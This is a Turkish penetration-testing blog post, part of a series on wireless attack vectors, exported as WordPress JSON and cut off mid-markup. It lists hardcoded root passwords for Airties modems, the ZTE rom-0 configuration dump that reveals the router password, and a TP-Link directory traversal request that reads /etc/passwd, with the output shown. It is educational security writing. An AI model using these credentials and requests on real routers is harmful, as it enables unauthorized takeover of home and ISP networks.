{"id":493,"date":"2015-08-16T22:01:14","date_gmt":"2015-08-16T19:01:14","guid":{"rendered":"https:\/\/furkansandal.com\/sizma-testlerinde-kablosuz-aglar-ve-atak-vektorleri-x\/"},"modified":"2015-08-16T22:01:14","modified_gmt":"2015-08-16T19:01:14","slug":"sizma-testlerinde-kablosuz-aglar-ve-atak-vektorleri-x","status":"publish","type":"post","link":"https:\/\/furkansandal.com\/sizma-testlerinde-kablosuz-aglar-ve-atak-vektorleri-x\/","title":{"rendered":"S\u0131zma Testlerinde Kablosuz A\u011flar Ve Atak Vekt\u00f6rleri &#8211; X"},"content":{"rendered":"<div readability=\"62.8401775805\">\n<h3 dir=\"ltr\" style=\"line-height: 1.15; margin-bottom: 0pt; margin-top: 8pt; text-align: justify;\">\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">AP\/Router \u00dczerinde \u00c7\u0131kan Zafiyetler <\/span><\/h3>\n<p><span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Access Point arabirimi, yaz\u0131l\u0131m\u0131 (firmware) di\u011fer bir\u00e7ok a\u011f cihaz\u0131 gibi g\u00fcvenlik zafiyetleri bar\u0131nd\u0131rabilirler. Bu zafiyetler ve \u00f6ntan\u0131ml\u0131 hesaplar t\u00fcm kablosuz a\u011f\u0131n g\u00fcvenli\u011fini tehlikeye atmaktad\u0131r. A\u015fa\u011f\u0131da g\u00f6r\u00fclece\u011fi \u00fczere bu zafiyetler farkl\u0131 markaya sahip cihazlarda \u00e7\u0131kabilmektedir ve maalesef \u00fcreticilerden bu konuda gerekli g\u00fcvenlik g\u00fcncellemeleri gelmemektedir. Bu durum riskin b\u00fcy\u00fckl\u00fc\u011f\u00fcn\u00fc art\u0131rmaktad\u0131r.<\/span><\/p>\n<div dir=\"ltr\" style=\"line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;\" readability=\"11\">\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.15; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Genellikle g\u00f6m\u00fcl\u00fc Linux t\u00fcrevi i\u015fletim sistemleri \u00e7al\u0131\u015ft\u0131ran bu cihazlarda pop\u00fcler i\u015fletim sistemlerinde ve uygulamalardaki gibi bellek ta\u015fmas\u0131 t\u00fcrevi zafiyetler g\u00f6r\u00fclebilir. Bu zafiyetler cihaz \u00fczerinde tam yetkili kod \u00e7al\u0131\u015ft\u0131rmaya sebep olacak kritiklikte olabilirler. B\u00f6yle bir zafiyet arac\u0131l\u0131\u011f\u0131yla sald\u0131rgan cihaz\u0131n, dolay\u0131s\u0131yla t\u00fcm yerel a\u011f\u0131n kontrol\u00fcn\u00fc ele ge\u00e7irebilir.<\/span><\/p>\n<p><b><span style=\"font-family: Arial, Helvetica, sans-serif;\">Airties<\/span><\/b><\/div>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">\u00d6rnek olarak son zamanlarda ortaya \u00e7\u0131kan Airties modemlere ait root parolas\u0131 verilebilir. \u0130lgili zafiyete g\u00f6re Air6372SO modemlerin parolas\u0131n\u0131n(dsl_2012_Air) firmware \u00fczerinden kolayca \u00f6\u011frenilebilece\u011fi ve uzaktan bu modemlere telnet 2323 portu \u00fczerinden eri\u015filebilece\u011fi g\u00f6r\u00fclm\u00fc\u015ft\u00fcr. Ayn\u0131 \u015fekilde ba\u015fka modeller \u00fczerinde de buna benzer zafiyetler oldu\u011fu tespit edilmi\u015ftir: Airties RT-206v4 modeli root parolas\u0131: SoL_FiBeR_1357<\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><br \/><b><span style=\"font-family: Arial, Helvetica, sans-serif;\">ZTE, TP-Link, ZynOS, Huawei<\/span><\/b><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">T\u00fcrkiye\u2019de de s\u0131kl\u0131kla rastlanan modem modellerinden ZTE VX10 W300 \u00fczerinde router parolas\u0131n\u0131n elde edilebilece\u011fi bir zafiyet vard\u0131r. Bu zafiyete g\u00f6re <\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"\/><br \/>\n<\/span><br \/>\n<br \/>\n<span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">dosyas\u0131 basit bir GET iste\u011fiyle herhangi bir kimlik do\u011frulamaya ihtiya\u00e7 duyulmadan indirilebilmektedir.<\/span><\/p>\n<div dir=\"ltr\" style=\"line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;\">\n<span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"> <\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><img decoding=\"async\" height=\"361px;\" src=\"https:\/\/lh5.googleusercontent.com\/Ew-d-mgwrqqgeeKtxnxHsgNVTeLdS-d9_axYkMcvRjkGDb1Nf9P22mvGHKc3vLF8Etb0cbtgsQnXdDRE90gU_D-gE7OgNe7CvPBr_U7nIgLVXt3lSX86cP5ePqQcb8JV0w\" style=\"-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);\" width=\"624px;\"\/><\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><br \/>Dosya indirilerek modem yap\u0131land\u0131rmas\u0131 hakk\u0131nda fikir sahibi olunabilmektedir. Ancak burada router parolas\u0131 ele ge\u00e7irilecektir. Bunun i\u00e7in basit bir python script kullan\u0131larak rom-0 dosyas\u0131 okunabilir.<\/span><\/span><\/div>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<div dir=\"ltr\" style=\"margin-left: 0pt;\">\n<table style=\"border-collapse: collapse; border: none; width: 624px;\">\n<colgroup>\n<col width=\"*\"\/><\/colgroup>\n<tbody readability=\"4\">\n<tr style=\"height: 0px;\" readability=\"18.5\">\n<td style=\"border-bottom: solid #000000 1px; border-left: solid #000000 1px; border-right: solid #000000 1px; border-top: solid #000000 1px; padding: 7px 7px 7px 7px; vertical-align: top;\" readability=\"24\">\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">python rom0-decomp.py<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">[+] ZTE, TP-Link, ZynOS, Huawei rom-0 Configuration Decompressor<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">[+] Author: Osanda Malith Jayathissa<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">[+] Special thanks to Nick Knight<\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><br \/><\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">[*] Opeining rom-0 file<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">[+] Dump:<\/span><\/p>\n<p>\n<span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">\ufffd\ufffd\ufffd\ufffd<\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><span class=\"Apple-tab-span\" style=\"white-space: pre;\"> <\/span><\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">l<\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><span class=\"Apple-tab-span\" style=\"white-space: pre;\"> <\/span><\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">ttnetZTE60publicpublicpublic\ufffdPPP\ufffdP\ufffdP\ufffdP\ufffd5\ufffdP\ufffdP\ufffd<\/span><\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\ufffd<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0@<\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><br \/><\/span><\/p>\n<p>\n<span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">[+] Filtered Strings: <\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><span class=\"Apple-tab-span\" style=\"white-space: pre;\"> <\/span><\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">l<\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><span class=\"Apple-tab-span\" style=\"white-space: pre;\"> <\/span><\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">ttnetZTE60publicpublicpublicPPPPPP5PP@<\/span><\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><br \/><\/span><\/p>\n<p>\n<span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">[~] Router Password is: <\/span><span style=\"background-color: transparent; color: black; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">ttnet<\/span><\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Ayn\u0131 bir modemde ikinci bir zafiyet kullan\u0131larak WAN parolas\u0131 ele ge\u00e7irilebilmektedir. Bunun i\u00e7in modem aray\u00fcz\u00fcne yukar\u0131da ele ge\u00e7irilen admin parolas\u0131 kullan\u0131larak eri\u015filir. Interface setup, \u0130nternet sekmesine sa\u011f t\u0131klan\u0131p \u00e7er\u00e7eve kaynak kodu g\u00f6r\u00fcnt\u00fclendi\u011finde PPPoE\/PPPoA parolas\u0131 elde edilebilmektedir.<\/span><\/p>\n<div dir=\"ltr\" style=\"line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;\">\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><img decoding=\"async\" height=\"401px;\" src=\"https:\/\/lh6.googleusercontent.com\/oJm1kkuDfHUjYNjg0uMHEc2VSFuZ-4g9le6B7zAhDFSEMW_pI7pb3OwpyNqcEIuEJwcVMVQFRqLI-irYKrPGP65BWebWv3c5VLlXTbjR7fQJsF6RJfqtqab0YWTlI_GyZw\" style=\"-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);\" width=\"624px;\"\/><\/span><\/div>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<div dir=\"ltr\" style=\"line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;\">\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><img decoding=\"async\" height=\"91px;\" src=\"https:\/\/lh5.googleusercontent.com\/8E8WlqW1a0Iimurilfk5mTyifQa1pimRTb9EDYM9UG_LYCqw9bW_Vj2GCySi0ZXjpP2AUCco6ZIOIm9aTUlam72FiI8XdD8QDq3u8oVwYMxKR2CMC1j2WtW_i3k6k5RFiQ\" style=\"-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);\" width=\"460px;\"\/><\/span><\/div>\n<p><b style=\"font-weight: normal;\"><span style=\"font-family: Arial, Helvetica, sans-serif;\"><br \/><\/span><\/b><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><b>TP-Link<\/b><\/span><br \/><span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">\u0130kinci bir \u00f6rnek olarak TP-Link TL-WA701N \u00a0modeli 3.12.6 Build 110210 Rel.37112n firmware \u00fczerinde Directory Traversal tipi atak tespit edilmi\u015f. Bu atak istismar edilerek \/etc\/passwd dosyas\u0131 okunabilmektedir.<\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">\u0130stek<\/span><\/p>\n<div dir=\"ltr\" style=\"margin-left: 0pt;\">\n<table style=\"border-collapse: collapse; border: none; width: 624px;\">\n<colgroup>\n<col width=\"*\"\/><\/colgroup>\n<tbody readability=\"6\">\n<tr style=\"height: 0px;\" readability=\"22.5\">\n<td style=\"border-bottom: solid #000000 1px; border-left: solid #000000 1px; border-right: solid #000000 1px; border-top: solid #000000 1px; padding: 7px 7px 7px 7px; vertical-align: top;\" readability=\"24\">\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">GET \/help\/..\/..\/etc\/passwd HTTP\/1.1<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Host: 192.168.178.2<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko\/20100101 Firefox\/14.0.1<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Accept-Encoding: gzip, deflate<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Proxy-Connection: keep-alive<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Referer: http:\/\/192.168.178.2\/help\/<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Cevap<\/span><\/p>\n<div dir=\"ltr\" style=\"margin-left: 0pt;\">\n<table style=\"border-collapse: collapse; border: none; width: 624px;\">\n<colgroup>\n<col width=\"*\"\/><\/colgroup>\n<tbody readability=\"4.5\">\n<tr style=\"height: 0px;\" readability=\"35\">\n<td style=\"border-bottom: solid #000000 1px; border-left: solid #000000 1px; border-right: solid #000000 1px; border-top: solid #000000 1px; padding: 7px 7px 7px 7px; vertical-align: top;\" readability=\"55\">\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">HTTP\/1.1 200 OK<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Server: TP-LINK Router<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Connection: close<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">WWW-Authenticate: Basic realm=&#8221;TP-LINK Wireless Lite N Access Point WA701N&#8221;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Content-Type: text\/html<\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><br \/><\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">&lt;META http-equiv=Content-Type content=&#8221;text\/html; charset=iso-8859-1&#8243;&gt;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">&lt;HTML&gt;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">&lt;HEAD&gt;&lt;TITLE&gt;TL-WA701N&lt;\/TITLE&gt;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">&lt;META http-equiv=Pragma content=no-cache&gt;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">&lt;META http-equiv=Expires content=&#8221;wed, 26 Feb 1997 08:21:57 GMT&#8221;&gt;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">&lt;LINK href=&#8221;\/dynaform\/css_help.css&#8221; rel=stylesheet type=&#8221;text\/css&#8221;&gt;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">&lt;SCRIPT language=&#8221;javascript&#8221; type=&#8221;text\/javascript&#8221;&gt;&lt;!&#8211;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">if(window.parent == window)window.location.href=&#8221;http:\/\/192.168.178.2&#8243;;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">function Click() return false;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">document.oncontextmenu=Click;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">function doPrev()history.go(-1);<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">\/\/&#8211;&gt;&lt;\/SCRIPT&gt;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">root:x:0:0:root:\/root:\/bin\/sh<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Admin:x:0:0:root:\/root:\/bin\/sh<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">bin:x:1:1:bin:\/bin:\/bin\/sh<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">daemon:x:2:2:daemon:\/usr\/sbin:\/bin\/sh<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">adm:x:3:4:adm:\/adm:\/bin\/sh<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">lp:x:4:7:lp:\/var\/spool\/lpd:\/bin\/sh<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">sync:x:5:0:sync:\/bin:\/bin\/sync<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">shutdown:x:6:11:shutdown:\/sbin:\/sbin\/shutdown<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">halt:x:7:0:halt:\/sbin:\/sbin\/halt<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">uucp:x:10:14:uucp:\/var\/spool\/uucp:\/bin\/sh<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">operator:x:11:0:Operator:\/var:\/bin\/sh<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">nobody:x:65534:65534:nobody:\/home:\/bin\/sh<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; 